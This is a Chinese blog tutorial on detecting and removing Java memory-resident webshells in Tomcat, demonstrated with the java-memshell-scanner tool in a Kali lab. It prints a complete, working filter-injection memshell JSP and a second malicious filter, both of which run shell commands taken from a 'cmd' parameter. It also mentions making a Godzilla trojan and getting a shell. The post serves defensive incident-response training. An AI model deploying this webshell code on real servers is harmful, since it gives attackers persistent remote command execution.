应急--内存马查杀演示(极简)

已于 2023-08-30 17:15:08 修改
阅读量3k 收藏 14
点赞数 1
分类专栏: 内存马查杀 文章标签: 网络安全 安全 web安全 tomcat servlet
于 2023-08-30 16:55:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58355451/article/details/132585358
版权

初识内存马

内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到。与传统的计算机病毒不同,内存马不会将自身代码写入到磁盘上的文件中,而是将恶意代码直接注入到计算机的内存中,并在系统内核级别运行。
​
由客户端发起的Web请求后,中间件的各个独立的组件如Listener、Filter、Servlet等组件会在请求过程中做监听、判断、过滤等操作,内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode,达到持久化控制服务器的目的。内存马可以通过访问存在漏洞的url加上命令执行参数,即可让服务器返回结果也可通过webshell管理工具例如:蚁剑、冰蝎、哥斯拉等进行远程连接后攻击目标。

内存马类型

内存马在语言类型上有PHP内存马,Python内存马,而本文主要侧重于“市场占有率”最高的java内存马的检测与查杀,java内存马又主要分为下面这三大类
​
1.servlet-api型
通过命令执行等方式动态注册一个新的listener、filter或者servlet,从而实现命令执行等功能。特定框架、容器的内存马原理与此类似,如spring的controller内存马,tomcat的valve内存马
​
2.字节码增强型
通过java的instrumentation动态修改已有代码,进而实现命令执行等功能。

原理

1.内存映射:操作系统提供了一种将磁盘上的文件直接映射到进程的内存空间的机制,这样进程可以像访问内存一样访问文件的内容。)。
​
2.恶意注入:攻击者创建一个恶意文件,并将其存储在磁盘上。然后,通过某种方式(例如利用漏洞或url注入)将这个恶意文件注入到目标进程的内存空间中。
​
3.映射文件:攻击者利用操作系统的内存映射机制,将恶意文件映射到目标进程的内存空间中的某个地址范围。这样,进程就可以像访问内存一样访问这个恶意文件。
​
访问任意url或者指定url,带上命令执行参数,即可让服务器返回命令执行结果。
​
以java为例,客户端发起的web请求会依次经过Listener、Filter、Servlet三个组件,我们只要在这个请求的过程中做手脚,在内存中修改已有的组件或者动态注册一个新的组件,插入恶意的shellcode,就可以达到我们的目的。

内存马查杀示例(极简)

这是c0ny1师傅编写的jsp内存马检测脚本
​
脚本地址:https://github.com/c0ny1/java-memshell-scanner

环境搭建

kali充当服务器
1.搭建web环境
官网:http://tomcat.apache.org/下载tomcat对应的linux版本
例如我下载的:apache-tomcat-9.0.80.tar.gz

2.解压(任意文件夹)
tar -zxvf apache-tomcat-9.0.80.tar.gz
3.启动tomcat服务
进入解压后的bin目录,我的是:cd apache-tomcat-9.0.80/bin
启动脚本    ./startup.sh
普通用户权限添加sudo即可

本机访问8080端口,检测是否能过正常访问
centos或其他系统情况下可能有防火墙问题,关闭防火墙可正常访问
systemctl stop firewalld.service

附上大佬的内存马脚本,创建memshell.jsp,功能是访问之后会自动注入到filterMaps最前面,每次调用filter最先触发内存马

<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
​
<%
    final String name = "cyc1ops";
    ServletContext servletContext = request.getSession().getServletContext();
​
    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
​
    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
​
    Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    Configs.setAccessible(true);
    Map filterConfigs = (Map) Configs.get(standardContext);
​
    if (filterConfigs.get(name) == null){
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {
​
            }
​
            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                HttpServletRequest req = (HttpServletRequest) servletRequest;
                if (req.getParameter("cmd") != null){
                    byte[] bytes = new byte[1024];
                    Process process = new ProcessBuilder("bash","-c",req.getParameter("cmd")).start();
                    int len = process.getInputStream().read(bytes);
                    servletResponse.getWriter().write(new String(bytes,0,len));
                    process.destroy();
                    return;
                }
                filterChain.doFilter(servletRequest,servletResponse);
            }
​
            @Override
            public void destroy() {
​
            }
​
        };
​
​
        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(name);
        filterDef.setFilterClass(filter.getClass().getName());
        /**
         * 将filterDef添加到filterDefs中
         */
        standardContext.addFilterDef(filterDef);
​
        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("/*");
        filterMap.setFilterName(name);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());
​
        standardContext.addFilterMapBefore(filterMap);
​
        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);
​
        filterConfigs.put(name,filterConfig);
        out.print("Inject Success !");
    }
%>
访问将上面内存马放到web根目录下默认在:/apache-tomcat-9.0.80/webapps/ROOT
访问内存马

尝试访问项目下任意路径,添加cmd参数,命令执行成功

尝试可以,现在开始查杀演示
新建一个memShell_test.jsp
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
​
@WebServlet("/memShell_test")
public class TestServlet extends HttpServlet{
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
//        super.doGet(req, resp);
        resp.getWriter().write("Test memshell");
    }
​
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
//        super.doPost(req, resp);
    }
}
新建一个恶意filter
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
​
import java.io.IOException;
import java.io.InputStream;
import java.util.Scanner;
​
@WebFilter("/*")
public class cmd_Filters implements Filter {
    public void destroy() {
    }
​
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws ServletException, IOException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        if (req.getParameter("cmd") != null) {
            boolean isLinux = true;
            String osTyp = System.getProperty("os.name");
            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                isLinux = false;
            }
            String[] cmds = isLinux ? new String[]{"sh", "-c", req.getParameter("cmd")} : new String[]{"cmd.exe", "/c", req.getParameter("cmd")};
            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
            Scanner s = new Scanner(in).useDelimiter("\\A");
            String output = s.hasNext() ? s.next() : "";
            resp.getWriter().write(output);
            resp.getWriter().flush();
        }
        chain.doFilter(request, response);
    }
​
    public void init(FilterConfig config) throws ServletException {
​
    }
​
}
访问项目下任意路径,添加cmd参数,命令执行成功

开始查杀
​
直接把 java-memshell-scanner 脚本放在web目录下,访问
可以看到列表中的恶意filter编译后的class文件

进入对应class所在的地址删除class(进入过程中可能会有权限问题,普通用户可使用 sudo chmod 777 目录名 添加权限)

在对应目录下删除了可疑jsp编译后的class文件仍能命令执行成功

现将其kill掉

再次使用内存马cmd命令执行,发现执行失败,同时在scanner界面可疑文件已经消失,到此结束。

附加

哥斯拉生成a.jsp的java木马,密码pass

测试连接成功

连接成功,getshell

nobms
关注
专栏目录
tomcat-memshell-scanner.jsp
12-18
Java内存查杀 这里推荐几款内存查杀工具 java-memshell-scanner:通过jsp脚本扫描并查杀各类中间件内存。 只需要将tomcat-memshell-scanner.jsp放在可能被注入内存web录下,然后使用浏览器访问即可直接获得扫描结果。
护网HW面试常问——webshell&内存流量特征以及查杀
DamnVanish的博客
07-13 1430
先判断是通过什么方法注入的内存,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存注入流量特征与普通webshell的流量特征基本吻合。冰蝎与webshell建立连接的同时,java也与目的主机建立tcp连接,每次连接使用本地端口在49700左右,每连接一次,每建立一次新的连接,端口就依次增加。可以对符合该范围内的端口告警。
工具分享 | 自研内存查杀工具MemShellKiller,红队必备
最新发布
IT软件汇
09-11 213
工具分享 | 自研内存查杀工具MemShellKiller,红队必备
查杀内存工具
weixin_46211944的博客
09-23 555
查杀内存工具。
应急响应 -162天:webshell和内存查杀
wuqingsix的博客
02-14 957
如:利用此系统中间件等爆出的通用漏洞,利用安全知识进行模拟攻击,了解外来攻击的方法。应急人员:通过网站程序利用红队思路排查漏洞,根据漏洞数据包配合日志分析攻击行为。应急人员:在时间和漏洞配合日志没有头绪分析下,可以尝试对后门分析找到攻击行为。获取当前WEB环境的组成架构(语言,数据库,中间件,系统等)如:翻日志 确定攻击时间,请求方式,请求地址,ip。背景交代:某公司在某个时间发现网站出现篡改或异常。背景交代:某公司在发现网站出现篡改或异常。背景交代:某公司在发现网站出现篡改或异常。
内存检测排查手段
热门推荐
SimoSimoSimo的博客
11-05 2万+
内存是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存因其隐蔽性等优点从而越来越盛行。
网络安全】Agent内存的自动分析与查杀
2201_75857562的博客
02-06 480
接下来介绍做了些什么,能够实现怎样的效果不难看出,以上内存查杀手段都是半自动结合人工审核的方式,当检测出内存后检测(同时支持普通内存和Java Agent内存的检测)分析(如何确定该类是内存,仅根据恶意类名和注解等信息不完善)查杀(当确定内存存在,如何自动地删除内存并恢复正常业务逻辑)大致看来,实现起来似乎不难,然而实际中遇到了很多坑,接下来我会逐个介绍关于Dump字节码经过我的一些测试,使用sa-jdi库不能保证dump。
Filter/Servlet内存的扫描抓捕与查杀
Websec
05-30 709
1、GitHub - c0ny1/java-memshell-scanner: 通过jsp脚本扫描java web Filter/Servlet内存 0x01 简介 通过jsp脚本扫描并查杀各类中间件内存,比Java agent要温和一些。 0x02 截图 增加Listener型内存检测,如果不存在Listener则不显示该项 0x03 更多 Filter/Servlet内存的扫描抓捕与查杀 | 回忆飘如雪 ...
内存查杀工具FindShell试用
HRay's blog
03-17 6789
首先使用冰蝎创建一个内存 成功进入内存界面 接下来尝试使用findshell查杀,项目主页为 https://github.com/4ra1n/FindShell 服务器上首先部署代码,执行 git clone https://github.com/4ra1n/FindShell.git 然后进入到FindShell目录,打包项目,执行(如果没有mvn命令需要先yum -y install apache-maven安装) mvn package 打包后在targe..
内存查杀工具使用
m0_64777251的博客
06-24 732
jadheapdump干货|冰蝎、哥斯拉 内存应急排查_冰蝎内存-CSDN博客。
DuckMemoryScan:检测绝大部分所谓的内存免杀
03-04
DuckMemoryScan 一个简单寻找包括不限于iis劫持,无文件木,shellcode免杀后门的工具,由huoji花了1天编写,编写时间2021-02-24 !!!!!!!!!!!!!!!!!!!!!!!!! ,不要执行32位编译!!! !!!本工具不能代替杀毒软件!!! 运行截图 功能列表 HWBP hook检测检测线程中所有疑似被hwbp隐形链接 内存免杀shellcode检测(metasploit,Cobaltstrike完全检测) 可疑进展检测(主要针对有逃避性质的进展[如过期签名与多部分细分段]) 无文件落地木检测(检测所有已知内存加载木) 简易rootkit检测(检测证书过期/拦截复制/证书无效的驱动) 检测异常模块,检测绝大部分如“ iis劫持”的后门(2021年2月26日添加) 免杀木检测原理: 所有所谓的内存免杀后门大部分基于“ VirtualAlloc”函
内存查杀copagent研究
SHELLCODE_8BIT的博客
09-11 1439
1.cop注入进程jvm进程2.agent扫描进程。
内存介绍及分析-带查杀工具tomcat memshell scanner.jsp
weixin_65629944的博客
12-18 1083
先判断是通过什么方法注入的内存,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具:是一款免费的,集成了多个 JDK 命令行工具的可视化工具,它能为您提供强大的分析能力,对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。
PHP内存技术研究与查杀方法总结
不忘初心,护天下安全!
06-28 964
内存是无文件攻击的一种常用手段,随着攻防演练热度越来越高:攻防双方的博弈,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到,内存使用越来越多。 由客户端发起的Web请求后,中间件的各个独立的组件如Listener、Filter、Servlet等组件会在请求过程中做监听、判断、过滤等操作,内存就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode,达到持久化控制服务器的目的传统的Webshell
应急响应篇】内存应急响应指南
大河之犬的博客
04-16 892
Spring MVC 的拦截器(Interceptor)与 Java Servlet 的过滤器(Filter)类似,它主要用于拦截用户的请求并做相应的处理,通常应用在权限验证、记录请求信息的日志、判断用户是否登录等功能上。copagent 使用 javaagent 技术获得了全部的类,判断其包名、实现类名、接口名、注解来提取关键类,并根据类是否在磁盘上有资源链接对象、类中是否包含恶意行为关键字来判断其是否为内存。使用时先访问恶意的jsp动态注册Servlet,之后访问对应路径的Servlet命令执行。
HVV之内存检测工具
公众号:乌云安全
09-23 763
一个简单寻找包括不限于iis劫持,无文件木,shellcode免杀后门的工具,本程序需要64位编译才能回溯x64的程序堆栈,请勿执行32位编译。本工具不能代替杀毒软件。功能列表HWBP hook检测 检测线程中所有疑似被hwbp隐形挂钩内存免杀shellcode检测(metasploit,Cobaltstrike完全检测)可疑进程检测(主要针对有逃避性质的进程[如过期签名与多各可执行区段])无文件落地木检测(检测所有已知内存加载木)
应急响应-网站入侵篡改指南&Webshell内存查杀&漏洞排查&时间分析
siu~
04-03 1461
网站入侵篡改防范应对指南 主要需了解:异常特征,处置流程,分析报告等 主要需了解:日志存储,Webshell检测,分析思路等
内存march扫描算法
06-16
内存 march 扫描算法是一种用于测试计算机内存是否存在硬件故障的基准测试方法。它通过在内存中存储和读取数据模式的不同组合,来检测内存中的故障。下面是一个简单的内存 march 扫描算法: 1. 定义一个数据块大小,例如 1KB。 2. 从内存中分配一个大的数组,大小为测试期望的最大内存块大小的两倍。 3. 将数组分成四个部分,每个部分大小为数组总大小的四分之一。 4. 对于每个部分,执行以下步骤: a. 使用全 0 或全 1 的模式来初始化数据块。 b. 对于每个数据块大小,按照以下模式存储和读取数据: i. 存储全 0 模式的数据块。 ii. 存储全 1 模式的数据块。 iii. 存储交替的 0 和 1 模式的数据块。 iv. 存储随机模式的数据块。 c. 检查存储和读取的数据是否匹配,如果不匹配,则表示内存中存在故障。 5. 输出所有部分的测试结果。 需要注意的是,内存 march 扫描算法只能检测硬件故障,而不能检测软件故障或其他问题。因此,在进行测试之前,应该确保计算机的软件环境和设置正确无误。同时,应该在相同的环境下多次运行测试,以获得更准确的结果。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值